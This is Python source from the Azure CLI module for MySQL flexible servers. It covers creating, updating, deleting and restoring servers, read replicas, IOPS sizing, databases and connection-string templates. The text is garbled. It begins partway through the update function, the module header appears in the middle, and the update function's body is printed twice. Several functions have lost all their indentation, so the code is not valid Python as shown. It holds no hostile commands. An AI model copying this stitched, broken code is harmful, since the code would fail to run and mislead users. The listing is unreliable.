            max_allowed_iops_new_sku = iops_info[tier][sku_name]
            default_iops = 100
            free_iops = (instance.storage_profile.storage_mb // 1024) * 3  # 3 free IOPS per GiB
            # Downgrading SKU
            if new_sku_rank < old_sku_rank:
                if supplied_iops > max_allowed_iops_new_sku:
                    iops = max_allowed_iops_new_sku
                    logger.warning('The max IOPS for your sku is %s. Provisioning the server with %s...', iops, iops)
                elif supplied_iops < default_iops:
                    if free_iops < default_iops:
                        iops = default_iops
                        logger.warning('The min IOPS is %s. Provisioning the server with %s...', default_iops,
                                       default_iops)
                    else:
                        iops = min(max_allowed_iops_new_sku, free_iops)
                        logger.warning('Updating the server with %s free IOPS...', iops)
            else:  # Upgrading SKU
                if supplied_iops > max_allowed_iops_new_sku:
                    iops = max_allowed_iops_new_sku
                    logger.warning(
                        'The max IOPS for your sku is %s. Provisioning the server with %s...', iops, iops)
                elif supplied_iops <= max_allowed_iops_new_sku:
                    iops = max(supplied_iops, min(free_iops, max_allowed_iops_new_sku))
                    if iops != supplied_iops:
                        logger.warning('Updating the server with %s free IOPS...', iops)
                # NOTE(review): the two branches below are unreachable — every value
                # not > max_allowed_iops_new_sku is caught by the elif above. Kept
                # as-is to avoid behavior change; confirm intent before removing.
                elif supplied_iops < default_iops:
                    if free_iops < default_iops:
                        iops = default_iops
                        logger.warning(
                            'The min IOPS is %s. Updating the server with %s...', default_iops, default_iops)
                    else:
                        iops = min(max_allowed_iops_new_sku, free_iops)
                        logger.warning('Updating the server with %s free IOPS...', iops)
            instance.sku.name = sku_name
            instance.sku.tier = tier
        instance.storage_profile.storage_iops = iops
    # pylint: disable=too-many-boolean-expressions
    if (iops is None and tier is None and sku_name) or (iops is None and sku_name is None and tier):
        raise CLIError('Argument Error. If you pass --tier, --sku_name is a mandatory parameter and vice-versa.')
    if iops is None and sku_name and tier:
        # SKU change without an explicit IOPS request: carry the current IOPS,
        # clamped to the new SKU's maximum (downgrade) or topped up to the free
        # allowance (upgrade).
        new_sku_rank = sku_rank[sku_name]
        old_sku_rank = sku_rank[instance.sku.name]
        instance.sku.name = sku_name
        instance.sku.tier = tier
        max_allowed_iops_new_sku = iops_info[tier][sku_name]
        iops = instance.storage_profile.storage_iops
        if new_sku_rank < old_sku_rank:  # Downgrading
            if instance.storage_profile.storage_iops > max_allowed_iops_new_sku:
                iops = max_allowed_iops_new_sku
                logger.warning('Updating the server with max %s IOPS...', iops)
        else:  # Upgrading
            if instance.storage_profile.storage_iops < (instance.storage_profile.storage_mb // 1024) * 3:
                iops = min(max_allowed_iops_new_sku, (instance.storage_profile.storage_mb // 1024) * 3)
                logger.warning('Updating the server with free %s IOPS...', iops)
        instance.storage_profile.storage_iops = iops
    if backup_retention:
        instance.storage_profile.backup_retention_days = backup_retention
    if auto_grow:
        instance.storage_profile.storage_autogrow = auto_grow
    if subnet_arm_resource_id:
        instance.delegated_subnet_arguments.subnet_arm_resource_id = subnet_arm_resource_id
    if maintenance_window:
        logger.warning('If you are updating maintenance window with other parameter, maintenance window will be updated first. Please update the other parameters later.')
        # if 'disabled' is passed in, reset to default values
        if maintenance_window.lower() == "disabled":
            day_of_week = start_hour = start_minute = 0
            custom_window = "Disabled"
        else:
            day_of_week, start_hour, start_minute = parse_maintenance_window(maintenance_window)
            custom_window = "Enabled"
        # set values - if maintenance_window is None (never configured) create a new object
        if instance.maintenance_window is None:
            instance.maintenance_window = mysql_flexibleservers.models.MaintenanceWindow(
                day_of_week=day_of_week,
                start_hour=start_hour,
                start_minute=start_minute,
                custom_window=custom_window
            )
        else:
            instance.maintenance_window.day_of_week = day_of_week
            instance.maintenance_window.start_hour = start_hour
            instance.maintenance_window.start_minute = start_minute
            instance.maintenance_window.custom_window = custom_window
        # Maintenance-window updates are exclusive: return without touching other fields.
        return ServerForUpdate(maintenance_window=instance.maintenance_window)
    params = ServerForUpdate(sku=instance.sku,
                             storage_profile=instance.storage_profile,
                             administrator_login_password=administrator_login_password,
                             ssl_enforcement=ssl_enforcement,
                             delegated_subnet_arguments=instance.delegated_subnet_arguments,
                             tags=tags,
                             ha_enabled=ha_enabled,
                             replication_role=replication_role)
    if assign_identity:
        # NOTE(review): str.find returns 0 (falsy) when 'mysql' is at index 0, so this
        # is truthy only because the module path prefixes 'azure.mgmt...' — confirm.
        if server_module_path.find('mysql'):
            if instance.identity is None:
                instance.identity = mysql_flexibleservers.models.Identity()
            params.identity = instance.identity
    return params
def server_delete_func(cmd, client, resource_group_name=None, server_name=None, yes=None):
    """Delete a flexible server, prompting for confirmation unless --yes was passed.

    Returns the delete poller on success, or None when the user declines.
    On success, also scrubs the server-related keys from the CLI local context.
    """
    confirm = yes
    result = None  # default return value
    if not yes:
        confirm = user_confirmation(
            "Are you sure you want to delete the server '{0}' in resource group '{1}'".format(server_name,
                                                                                              resource_group_name),
            yes=yes)
    if confirm:
        try:
            result = client.begin_delete(resource_group_name, server_name)
            if cmd.cli_ctx.local_context.is_on:
                # Drop stale defaults so later commands don't target the deleted server.
                local_context_file = cmd.cli_ctx.local_context._get_local_context_file()  # pylint: disable=protected-access
                local_context_file.remove_option('mysql flexible-server', 'server_name')
                local_context_file.remove_option('mysql flexible-server', 'administrator_login')
                local_context_file.remove_option('mysql flexible-server', 'database_name')
        except Exception as ex:  # pylint: disable=broad-except
            # Log, then surface any failure (delete or context cleanup) as a CLIError.
            logger.error(ex)
            raise CLIError(ex)
    return result
# Parameter update command
def flexible_parameter_update(client, server_name, configuration_name, resource_group_name, source=None, value=None):
    """Set a server configuration parameter.

    With neither source nor value, the parameter is reset to its system
    default; a value without an explicit source is recorded as 'user-override'.
    """
    if source is None and value is None:
        # update the command with system default
        try:
            parameter = client.get(resource_group_name, server_name, configuration_name)
            value = parameter.default_value  # reset value to default
            source = "system-default"
        except CloudError as e:
            raise CLIError('Unable to get default parameter value: {}.'.format(str(e)))
    elif source is None:
        source = "user-override"
    parameters = mysql_flexibleservers.models.Configuration(
        name=configuration_name,
        value=value,
        source=source
    )
    return client.begin_update(resource_group_name, server_name, configuration_name, parameters)
# Replica commands
# Custom functions for server replica, will add PostgreSQL part after backend ready in future
def flexible_replica_create(cmd, client, resource_group_name, replica_name, server_name, no_wait=False, location=None, sku_name=None, tier=None, **kwargs):
    """Create a read replica of *server_name* named *replica_name*.

    NOTE(review): location/sku_name/tier arguments are unconditionally
    overwritten with the source server's values below, so callers cannot
    override them — confirm whether that is intended.
    """
    provider = 'Microsoft.DBforMySQL'
    # set source server id
    if not is_valid_resource_id(server_name):
        if len(server_name.split('/')) == 1:
            server_name = resource_id(subscription=get_subscription_id(cmd.cli_ctx),
                                      resource_group=resource_group_name,
                                      namespace=provider,
                                      type='flexibleServers',
                                      name=server_name)
        else:
            raise CLIError('The provided source-server {} is invalid.'.format(server_name))
    source_server_id_parts = parse_resource_id(server_name)
    try:
        source_server_object = client.get(source_server_id_parts['resource_group'], source_server_id_parts['name'])
    except CloudError as e:
        raise CLIError('Unable to get source server: {}.'.format(str(e)))
    # Replicas are created in the same location and with the same SKU as the source.
    location = source_server_object.location
    sku_name = source_server_object.sku.name
    tier = source_server_object.sku.tier
    parameters = mysql_flexibleservers.models.Server(
        sku=mysql_flexibleservers.models.Sku(name=sku_name, tier=tier),
        source_server_id=server_name,
        location=location,
        create_mode="Replica")
    return sdk_no_wait(no_wait, client.begin_create, resource_group_name, replica_name, parameters)
def flexible_replica_stop(client, resource_group_name, server_name):
    """Stop replication to *server_name* by clearing its replication role.

    Raises CLIError when the server cannot be fetched or is not a replica.
    """
    try:
        server_object = client.get(resource_group_name, server_name)
    except Exception as e:
        raise CLIError('Unable to get server: {}.'.format(str(e)))
    if server_object.replication_role is not None and server_object.replication_role.lower() != "replica":
        raise CLIError('Server {} is not a replica server.'.format(server_name))
    from importlib import import_module
    # Resolve ServerForUpdate from the same SDK module the server object came from.
    server_module_path = server_object.__module__
    module = import_module(server_module_path)  # replacement not needed for update in flex servers
    ServerForUpdate = getattr(module, 'ServerForUpdate')
    params = ServerForUpdate(replication_role='None')
    return client.begin_update(resource_group_name, server_name, params)
def flexible_server_mysql_get(cmd, resource_group_name, server_name):
    """Fetch a MySQL flexible server using a freshly built management client."""
    client = get_mysql_flexible_management_client(cmd.cli_ctx)
    return client.servers.get(resource_group_name, server_name)
def flexible_list_skus(cmd, client, location):
    """List the flexible-server SKUs available in *location*, with a pricing hint."""
    result = client.list(location)
    logger.warning('For prices please refer to https://aka.ms/mysql-pricing')
    return result
def _create_server(db_context, cmd, resource_group_name, server_name, location, backup_retention, sku_name, tier,
                   storage_mb, administrator_login, administrator_login_password, version, tags,
                   delegated_subnet_arguments,
                   assign_identity, public_network_access, ha_enabled, availability_zone, iops):
    """Create the flexible-server resource and block until the poller completes.

    Returns the created Server object from the SDK.
    """
    logging_name, server_client = db_context.logging_name, db_context.server_client
    logger.warning('Creating %s Server \'%s\' in group \'%s\'...', logging_name, server_name, resource_group_name)
    logger.warning('Your server \'%s\' is using sku \'%s\' (Paid Tier). '
                   'Please refer to https://aka.ms/mysql-pricing for pricing details', server_name, sku_name)
    # Note : passing public-network-access has no effect as the accepted values are 'Enabled' and 'Disabled'.
    # So when you pass an IP here(from the CLI args of public_access), it ends up being ignored.
    parameters = mysql_flexibleservers.models.Server(
        sku=mysql_flexibleservers.models.Sku(name=sku_name, tier=tier),
        administrator_login=administrator_login,
        administrator_login_password=administrator_login_password,
        version=version,
        public_network_access=public_network_access,
        storage_profile=mysql_flexibleservers.models.StorageProfile(
            backup_retention_days=backup_retention,
            storage_mb=storage_mb,
            storage_iops=iops),
        location=location,
        create_mode="Default",
        delegated_subnet_arguments=delegated_subnet_arguments,
        ha_enabled=ha_enabled,
        availability_zone=availability_zone,
        tags=tags)
    if assign_identity:
        parameters.identity = mysql_flexibleservers.models.Identity()
    return resolve_poller(
        server_client.begin_create(resource_group_name, server_name, parameters), cmd.cli_ctx,
        '{} Server Create'.format(logging_name))
def flexible_server_connection_string(
        server_name='{server}', database_name='{database}', administrator_login='{login}',
        administrator_login_password='{password}'):
    """Return driver connection strings for a flexible server without contacting Azure.

    Unspecified arguments are left as '{placeholder}' tokens for the user to fill in.
    """
    if database_name is None:
        database_name = 'mysql'  # fall back to the built-in system database
    fqdn = '{}.mysql.database.azure.com'.format(server_name)
    strings = _create_mysql_connection_strings(fqdn, administrator_login, administrator_login_password,
                                               database_name)
    return {'connectionStrings': strings}
def _create_mysql_connection_strings(host, user, password, database):
result = {
'mysql_cmd': "mysql {database} --host {host} --user {user} --password={password}",
'ado.net': "Server={host}; Port=3306; Database={database}; Uid={user}; Pwd={password};",
'jdbc': "jdbc:mysql://{host}:3306/{database}?user={user}&password={password}",
'jdbc Spring': "spring.datasource.url=jdbc:mysql://{host}:3306/{database} "
"spring.datasource.username={user} "
"spring.datasource.password={password}",
'node.js': "var conn = mysql.createConnection({{host: '{host}', user: '{user}', "
"password: {password}, database: {database}, port: 3306}});",
'php': "host={host} port=3306 dbname={database} user={user} password={password}",
'python': "cnx = mysql.connector.connect(user='{user}', password='{password}', host='{host}', "
"port=3306, database='{database}')",
'ruby': "client = Mysql2::Client.new(username: '{user}', password: '{password}', "
"database: '{database}', host: '{host}', port: 3306)",
}
connection_kwargs = {
'host': host,
'user': user,
'password': password if password is not None else '{password}',
'database': database
}
for k, v in result.items():
result[k] = v.format(**connection_kwargs)
return result
def _form_response(username, sku, location, server_id, host, version, password, connection_string, database_name,
firewall_id=None, subnet_id=None):
output = {
'host': host,
'username': username,
'password': password,
'skuname': sku,
'location': location,
'id': server_id,
'version': version,
'databaseName': database_name,
'connectionString': connection_string
}
if firewall_id is not None:
output['firewallName'] = firewall_id
if subnet_id is not None:
output['subnetId'] = subnet_id
return output
def _update_local_contexts(cmd, server_name, resource_group_name, location, user):
    """Persist the new server's coordinates in the CLI local context (if enabled)."""
    if cmd.cli_ctx.local_context.is_on:
        cmd.cli_ctx.local_context.set(['mysql flexible-server'], 'server_name',
                                      server_name)  # Setting the server name in the local context
        cmd.cli_ctx.local_context.set([ALL], 'location',
                                      location)  # Setting the location in the local context
        cmd.cli_ctx.local_context.set([ALL], 'resource_group_name', resource_group_name)
        cmd.cli_ctx.local_context.set(['mysql flexible-server'], 'administrator_login',
                                      user)  # Setting the administrator login in the local context
def _create_database(db_context, cmd, resource_group_name, server_name, database_name):
    """Create *database_name* (utf8 / utf8_general_ci) on the server if it does not already exist."""
    # check for existing database, create if not
    cf_db, logging_name = db_context.cf_db, db_context.logging_name
    database_client = cf_db(cmd.cli_ctx, None)
    try:
        database_client.get(resource_group_name, server_name, database_name)
    except ResourceNotFoundError:
        # Not found: create it and wait for the operation to finish.
        logger.warning('Creating %s database \'%s\'...', logging_name, database_name)
        parameters = {
            'name': database_name,
            'charset': 'utf8',
            'collation': 'utf8_general_ci'
        }
        resolve_poller(
            database_client.begin_create_or_update(resource_group_name, server_name, database_name, parameters), cmd.cli_ctx,
            '{} Database Create/Update'.format(logging_name))
def database_create_func(client, resource_group_name=None, server_name=None, database_name=None, charset=None, collation=None):
    """Create (or update) a database, defaulting to utf8 / utf8_general_ci when neither is given.

    Raises RequiredArgumentMissingError when only one of charset/collation is supplied.
    """
    if charset is None and collation is None:
        charset, collation = 'utf8', 'utf8_general_ci'
        logger.warning("Creating database with utf8 charset and utf8_general_ci collation")
    elif (not charset and collation) or (charset and not collation):
        # The pair must be supplied together; one without the other is ambiguous.
        raise RequiredArgumentMissingError("charset and collation have to be input together.")
    payload = {
        'name': database_name,
        'charset': charset,
        'collation': collation
    }
    return client.begin_create_or_update(resource_group_name, server_name, database_name, payload)
def _create_mysql_connection_string(host, database_name, user_name, password):
connection_kwargs = {
'host': host,
'dbname': database_name,
'username': user_name,
'password': password if password is not None else '{password}'
}
return 'mysql {dbname} --host {host} --user {username} --password={password}'.format(**connection_kwargs)
def _determine_iops(storage_gb, iops_info, iops, tier, sku_name):
default_iops = 100
max_supported_iops = iops_info[tier][sku_name]
free_storage_iops = storage_gb * 3
if iops is None:
return default_iops
if iops < default_iops:
if iops <= free_storage_iops:
iops = max(default_iops, min(max_supported_iops, free_storage_iops))
logger.warning('Your IOPS input is below the free IOPS provided. Provisioning the server with free %s IOPS...', iops)
elif iops > free_storage_iops:
iops = default_iops
logger.warning('The min IOPS is %s. Provisioning the server with %s...', iops, iops)
elif iops > max_supported_iops:
iops = max_supported_iops
logger.warning('The max IOPS for your sku is %s. Provisioning the server with %s IOPS...', iops, iops)
elif default_iops <= iops <= free_storage_iops:
iops = min(free_storage_iops, max_supported_iops)
logger.warning('Your IOPS input is below the free IOPS provided. Provisioning the server with %s free IOPS...', iops)
return iops
# pylint: disable=too-many-instance-attributes, too-few-public-methods, useless-object-inheritance
class DbContext(object):
    """Bundle of per-engine collaborators (SDK, client factories, names) threaded through the create helpers."""

    def __init__(self, azure_sdk=None, logging_name=None, cf_firewall=None, cf_db=None,
                 command_group=None, server_client=None):
        self.azure_sdk = azure_sdk          # SDK namespace (mysql_flexibleservers here)
        self.cf_firewall = cf_firewall      # firewall-rule client factory
        self.cf_db = cf_db                  # database client factory
        self.logging_name = logging_name    # human-readable engine name used in log messages
        self.command_group = command_group  # CLI command-group key (e.g. 'mysql')
        self.server_client = server_client  # pre-built servers operations client
# source: src/azure-cli/azure/cli/command_modules/rdbms/flexible_server_custom_mysql.py
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint: disable=unused-argument, line-too-long
import datetime as dt
from datetime import datetime
from msrestazure.azure_exceptions import CloudError
from msrestazure.tools import resource_id, is_valid_resource_id, parse_resource_id # pylint: disable=import-error
from knack.log import get_logger
from azure.core.exceptions import ResourceNotFoundError
from azure.cli.core.azclierror import RequiredArgumentMissingError
from azure.cli.core.commands.client_factory import get_subscription_id
from azure.cli.core.util import CLIError, sdk_no_wait
from azure.cli.core.local_context import ALL
from azure.mgmt.rdbms import mysql_flexibleservers
from ._client_factory import get_mysql_flexible_management_client, cf_mysql_flexible_firewall_rules, \
cf_mysql_flexible_db
from ._flexible_server_util import resolve_poller, generate_missing_parameters, create_firewall_rule, \
parse_public_access_input, generate_password, parse_maintenance_window, get_mysql_list_skus_info, \
DEFAULT_LOCATION_MySQL
from .flexible_server_custom_common import user_confirmation
from .flexible_server_virtual_network import create_vnet, prepare_vnet
from .validators import mysql_arguments_validator
logger = get_logger(__name__)
DEFAULT_DB_NAME = 'flexibleserverdb'
DELEGATION_SERVICE_NAME = "Microsoft.DBforMySQL/flexibleServers"
# region create without args
# pylint: disable=too-many-locals, too-many-statements
def flexible_server_create(cmd, client, resource_group_name=None, server_name=None, sku_name=None, tier=None,
                           location=None, storage_mb=None, administrator_login=None,
                           administrator_login_password=None, version=None,
                           backup_retention=None, tags=None, public_access=None, database_name=None,
                           subnet_arm_resource_id=None, high_availability=None, zone=None, assign_identity=False,
                           vnet_resource_id=None, vnet_address_prefix=None, subnet_address_prefix=None, iops=None):
    """Create a MySQL flexible server, filling in any missing parameters with defaults.

    Also provisions networking (vnet/subnet or firewall rule), a default
    database, records the result in the CLI local context, and returns a
    summary dict including a ready-made connection string.
    """
    # validator
    if location is None:
        location = DEFAULT_LOCATION_MySQL
    sku_info, iops_info = get_mysql_list_skus_info(cmd, location)
    mysql_arguments_validator(tier, sku_name, storage_mb, backup_retention, sku_info, version=version)
    db_context = DbContext(
        azure_sdk=mysql_flexibleservers, cf_firewall=cf_mysql_flexible_firewall_rules, cf_db=cf_mysql_flexible_db,
        logging_name='MySQL', command_group='mysql', server_client=client)
    # Raise error when user passes values for both parameters
    if subnet_arm_resource_id is not None and public_access is not None:
        raise CLIError("Incorrect usage : A combination of the parameters --subnet "
                       "and --public_access is invalid. Use either one of them.")
    # When address space parameters are passed, the only valid combination is : --vnet, --subnet, --vnet-address-prefix, --subnet-address-prefix
    # pylint: disable=too-many-boolean-expressions
    if (vnet_address_prefix is not None) or (subnet_address_prefix is not None):
        if (((vnet_address_prefix is not None) and (subnet_address_prefix is None)) or
                ((vnet_address_prefix is None) and (subnet_address_prefix is not None)) or
                ((vnet_address_prefix is not None) and (subnet_address_prefix is not None) and
                 ((vnet_resource_id is None) or (subnet_arm_resource_id is None)))):
            raise CLIError("Incorrect usage : "
                           "--vnet, --subnet, --vnet-address-prefix, --subnet-address-prefix must be supplied together.")
    server_result = firewall_id = subnet_id = None
    # Populate desired parameters
    location, resource_group_name, server_name = generate_missing_parameters(cmd, location, resource_group_name,
                                                                             server_name, 'mysql')
    server_name = server_name.lower()
    # Handle Vnet scenario
    if (subnet_arm_resource_id is not None) or (vnet_resource_id is not None):
        subnet_id = prepare_vnet(cmd, server_name, vnet_resource_id, subnet_arm_resource_id, resource_group_name,
                                 location, DELEGATION_SERVICE_NAME, vnet_address_prefix, subnet_address_prefix)
        delegated_subnet_arguments = mysql_flexibleservers.models.DelegatedSubnetArguments(
            subnet_arm_resource_id=subnet_id)
    elif public_access is None and subnet_arm_resource_id is None and vnet_resource_id is None:
        # No networking arguments at all: create a fresh vnet/subnet for the server.
        subnet_id = create_vnet(cmd, server_name, location, resource_group_name,
                                DELEGATION_SERVICE_NAME)
        delegated_subnet_arguments = mysql_flexibleservers.models.DelegatedSubnetArguments(
            subnet_arm_resource_id=subnet_id)
    else:
        delegated_subnet_arguments = None
    # calculate IOPS
    iops = _determine_iops(storage_mb, iops_info, iops, tier, sku_name)
    storage_mb *= 1024  # storage input comes in GiB value
    # Generate a password when the user did not supply one.
    administrator_login_password = generate_password(administrator_login_password)
    if server_result is None:
        # Create mysql server
        # Note : passing public_access has no effect as the accepted values are 'Enabled' and 'Disabled'. So the value ends up being ignored.
        server_result = _create_server(db_context, cmd, resource_group_name, server_name, location,
                                       backup_retention,
                                       sku_name, tier, storage_mb, administrator_login,
                                       administrator_login_password,
                                       version, tags, delegated_subnet_arguments, assign_identity, public_access,
                                       high_availability, zone, iops)
    # Adding firewall rule
    if public_access is not None and str(public_access).lower() != 'none':
        if str(public_access).lower() == 'all':
            start_ip, end_ip = '0.0.0.0', '255.255.255.255'
        else:
            start_ip, end_ip = parse_public_access_input(public_access)
        firewall_id = create_firewall_rule(db_context, cmd, resource_group_name, server_name, start_ip, end_ip)
    # Create mysql database if it does not exist
    if database_name is None:
        database_name = DEFAULT_DB_NAME
    _create_database(db_context, cmd, resource_group_name, server_name, database_name)
    user = server_result.administrator_login
    server_id = server_result.id
    loc = server_result.location
    version = server_result.version
    sku = server_result.sku.name
    host = server_result.fully_qualified_domain_name
    logger.warning('Make a note of your password. If you forget, you would have to reset your password with'
                   '\'az mysql flexible-server update -n %s -g %s -p <new-password>\'.',
                   server_name, resource_group_name)
    _update_local_contexts(cmd, server_name, resource_group_name, location, user)
    return _form_response(user, sku, loc, server_id, host, version,
                          administrator_login_password if administrator_login_password is not None else '*****',
                          _create_mysql_connection_string(host, database_name, user, administrator_login_password),
                          database_name, firewall_id, subnet_id)
def flexible_server_restore(cmd, client, resource_group_name, server_name, source_server, restore_point_in_time, location=None, no_wait=False):
    """Restore a new flexible server from *source_server* at *restore_point_in_time*.

    The restored server is always placed in the source server's location: the
    *location* argument is overwritten once the source server is resolved.
    Raises ValueError for an invalid source id or an unreachable source server.
    """
    provider = 'Microsoft.DBforMySQL'
    # Accept either a full ARM resource id or a bare server name for the source.
    if not is_valid_resource_id(source_server):
        if len(source_server.split('/')) == 1:
            source_server = resource_id(
                subscription=get_subscription_id(cmd.cli_ctx),
                resource_group=resource_group_name,
                namespace=provider,
                type='flexibleServers',
                name=source_server)
        else:
            raise ValueError('The provided source-server {} is invalid.'.format(source_server))
    # The timestamp may arrive with or without fractional seconds; try both formats.
    try:
        restore_point_in_time = datetime.strptime(restore_point_in_time, "%Y-%m-%dT%H:%M:%S.%f+00:00")
    except ValueError:
        restore_point_in_time = datetime.strptime(restore_point_in_time, "%Y-%m-%dT%H:%M:%S+00:00")
    restore_point_in_time = restore_point_in_time.replace(tzinfo=dt.timezone.utc)
    parameters = mysql_flexibleservers.models.Server(
        source_server_id=source_server,
        restore_point_in_time=restore_point_in_time,
        location=location,
        create_mode="PointInTimeRestore"
    )
    # Retrieve location from same location as source server
    id_parts = parse_resource_id(source_server)
    try:
        source_server_object = client.get(id_parts['resource_group'], id_parts['name'])
        parameters.location = source_server_object.location
    except Exception as e:
        # Chain the SDK error so the root cause is preserved for debugging.
        raise ValueError('Unable to get source server: {}.'.format(str(e))) from e
    return sdk_no_wait(no_wait, client.begin_create, resource_group_name, server_name, parameters)
# pylint: disable=too-many-branches
def flexible_server_update_custom_func(cmd, instance,
                                       sku_name=None,
                                       tier=None,
                                       storage_mb=None,
                                       backup_retention=None,
                                       administrator_login_password=None,
                                       ssl_enforcement=None,
                                       subnet_arm_resource_id=None,
                                       tags=None,
                                       auto_grow=None,
                                       assign_identity=False,
                                       ha_enabled=None,
                                       replication_role=None,
                                       maintenance_window=None,
                                       iops=None):
    """Mutate *instance* with the requested changes and return a ServerForUpdate payload.

    When --maintenance-window is supplied, only the maintenance window is
    updated and every other argument is ignored for that call (early return).
    """
    # validator
    location = ''.join(instance.location.lower().split())
    sku_info, iops_info = get_mysql_list_skus_info(cmd, location)
    mysql_arguments_validator(tier, sku_name, storage_mb, backup_retention, sku_info, instance=instance)
    from importlib import import_module
    server_module_path = instance.__module__
    module = import_module(server_module_path)  # replacement not needed for update in flex servers
    ServerForUpdate = getattr(module, 'ServerForUpdate')
    if storage_mb:
        instance.storage_profile.storage_mb = storage_mb * 1024  # input is GiB; the API takes MB
    # Relative SKU ordering, used to tell an upgrade from a downgrade when IOPS are recomputed.
    sku_rank = {'Standard_B1s': 1, 'Standard_B1ms': 2, 'Standard_B2s': 3, 'Standard_D2ds_v4': 4,
                'Standard_D4ds_v4': 5, 'Standard_D8ds_v4': 6,
                'Standard_D16ds_v4': 7, 'Standard_D32ds_v4': 8, 'Standard_D48ds_v4': 9, 'Standard_D64ds_v4': 10,
                'Standard_E2ds_v4': 11,
                'Standard_E4ds_v4': 12, 'Standard_E8ds_v4': 13, 'Standard_E16ds_v4': 14, 'Standard_E32ds_v4': 15,
                'Standard_E48ds_v4': 16,
                'Standard_E64ds_v4': 17}
    if location == 'eastus2euap':
        # Canary region additionally exposes the v3 SKUs at the same ranks.
        sku_rank.update({
            'Standard_D2s_v3': 4,
            'Standard_D4s_v3': 5, 'Standard_D8s_v3': 6,
            'Standard_D16s_v3': 7, 'Standard_D32s_v3': 8, 'Standard_D48s_v3': 9, 'Standard_D64s_v3': 10,
            'Standard_E2s_v3': 11,
            'Standard_E4s_v3': 12, 'Standard_E8s_v3': 13, 'Standard_E16s_v3': 14, 'Standard_E32s_v3': 15,
            'Standard_E48s_v3': 16,
            'Standard_E64s_v3': 17
        })
    if iops:
        if (tier is not None and sku_name is None) or (tier is None and sku_name is not None):
            raise CLIError('Argument Error. If you pass --tier, --sku_name is a mandatory parameter and vice-versa.')
        if tier is None and sku_name is None:
            # SKU unchanged: just clamp the requested IOPS against the current SKU.
            iops = _determine_iops(instance.storage_profile.storage_mb // 1024, iops_info, iops, instance.sku.tier, instance.sku.name)
        else:
            new_sku_rank = sku_rank[sku_name]
            old_sku_rank = sku_rank[instance.sku.name]
            supplied_iops = iops
            max_allowed_iops_new_sku = iops_info[tier][sku_name]
            default_iops = 100
            free_iops = (instance.storage_profile.storage_mb // 1024) * 3  # 3 free IOPS per GiB
            # Downgrading SKU
            if new_sku_rank < old_sku_rank:
                if supplied_iops > max_allowed_iops_new_sku:
                    iops = max_allowed_iops_new_sku
                    logger.warning('The max IOPS for your sku is %s. Provisioning the server with %s...', iops, iops)
                elif supplied_iops < default_iops:
                    if free_iops < default_iops:
                        iops = default_iops
                        logger.warning('The min IOPS is %s. Provisioning the server with %s...', default_iops,
                                       default_iops)
                    else:
                        iops = min(max_allowed_iops_new_sku, free_iops)
                        logger.warning('Updating the server with %s free IOPS...', iops)
            else:  # Upgrading SKU
                if supplied_iops > max_allowed_iops_new_sku:
                    iops = max_allowed_iops_new_sku
                    logger.warning(
                        'The max IOPS for your sku is %s. Provisioning the server with %s...', iops, iops)
                elif supplied_iops <= max_allowed_iops_new_sku:
                    iops = max(supplied_iops, min(free_iops, max_allowed_iops_new_sku))
                    if iops != supplied_iops:
                        logger.warning('Updating the server with %s free IOPS...', iops)
                # NOTE(review): the two branches below are unreachable — every value
                # not > max_allowed_iops_new_sku is caught by the elif above. Kept
                # as-is to avoid behavior change; confirm intent before removing.
                elif supplied_iops < default_iops:
                    if free_iops < default_iops:
                        iops = default_iops
                        logger.warning(
                            'The min IOPS is %s. Updating the server with %s...', default_iops, default_iops)
                    else:
                        iops = min(max_allowed_iops_new_sku, free_iops)
                        logger.warning('Updating the server with %s free IOPS...', iops)
            instance.sku.name = sku_name
            instance.sku.tier = tier
        instance.storage_profile.storage_iops = iops
    # pylint: disable=too-many-boolean-expressions
    if (iops is None and tier is None and sku_name) or (iops is None and sku_name is None and tier):
        raise CLIError('Argument Error. If you pass --tier, --sku_name is a mandatory parameter and vice-versa.')
    if iops is None and sku_name and tier:
        # SKU change without an explicit IOPS request: carry the current IOPS,
        # clamped to the new SKU's maximum (downgrade) or topped up to the free
        # allowance (upgrade).
        new_sku_rank = sku_rank[sku_name]
        old_sku_rank = sku_rank[instance.sku.name]
        instance.sku.name = sku_name
        instance.sku.tier = tier
        max_allowed_iops_new_sku = iops_info[tier][sku_name]
        iops = instance.storage_profile.storage_iops
        if new_sku_rank < old_sku_rank:  # Downgrading
            if instance.storage_profile.storage_iops > max_allowed_iops_new_sku:
                iops = max_allowed_iops_new_sku
                logger.warning('Updating the server with max %s IOPS...', iops)
        else:  # Upgrading
            if instance.storage_profile.storage_iops < (instance.storage_profile.storage_mb // 1024) * 3:
                iops = min(max_allowed_iops_new_sku, (instance.storage_profile.storage_mb // 1024) * 3)
                logger.warning('Updating the server with free %s IOPS...', iops)
        instance.storage_profile.storage_iops = iops
    if backup_retention:
        instance.storage_profile.backup_retention_days = backup_retention
    if auto_grow:
        instance.storage_profile.storage_autogrow = auto_grow
    if subnet_arm_resource_id:
        instance.delegated_subnet_arguments.subnet_arm_resource_id = subnet_arm_resource_id
    if maintenance_window:
        logger.warning('If you are updating maintenance window with other parameter, maintenance window will be updated first. Please update the other parameters later.')
        # if 'disabled' is passed in, reset to default values
        if maintenance_window.lower() == "disabled":
            day_of_week = start_hour = start_minute = 0
            custom_window = "Disabled"
        else:
            day_of_week, start_hour, start_minute = parse_maintenance_window(maintenance_window)
            custom_window = "Enabled"
        # set values - if maintenance_window is None (never configured) create a new object
        if instance.maintenance_window is None:
            instance.maintenance_window = mysql_flexibleservers.models.MaintenanceWindow(
                day_of_week=day_of_week,
                start_hour=start_hour,
                start_minute=start_minute,
                custom_window=custom_window
            )
        else:
            instance.maintenance_window.day_of_week = day_of_week
            instance.maintenance_window.start_hour = start_hour
            instance.maintenance_window.start_minute = start_minute
            instance.maintenance_window.custom_window = custom_window
        # Maintenance-window updates are exclusive: return without touching other fields.
        return ServerForUpdate(maintenance_window=instance.maintenance_window)
    params = ServerForUpdate(sku=instance.sku,
                             storage_profile=instance.storage_profile,
                             administrator_login_password=administrator_login_password,
                             ssl_enforcement=ssl_enforcement,
                             delegated_subnet_arguments=instance.delegated_subnet_arguments,
                             tags=tags,
                             ha_enabled=ha_enabled,
                             replication_role=replication_role)
    if assign_identity:
        # NOTE(review): str.find returns 0 (falsy) when 'mysql' is at index 0, so this
        # is truthy only because the module path prefixes 'azure.mgmt...' — confirm.
        if server_module_path.find('mysql'):
            if instance.identity is None:
                instance.identity = mysql_flexibleservers.models.Identity()
            params.identity = instance.identity
    return params
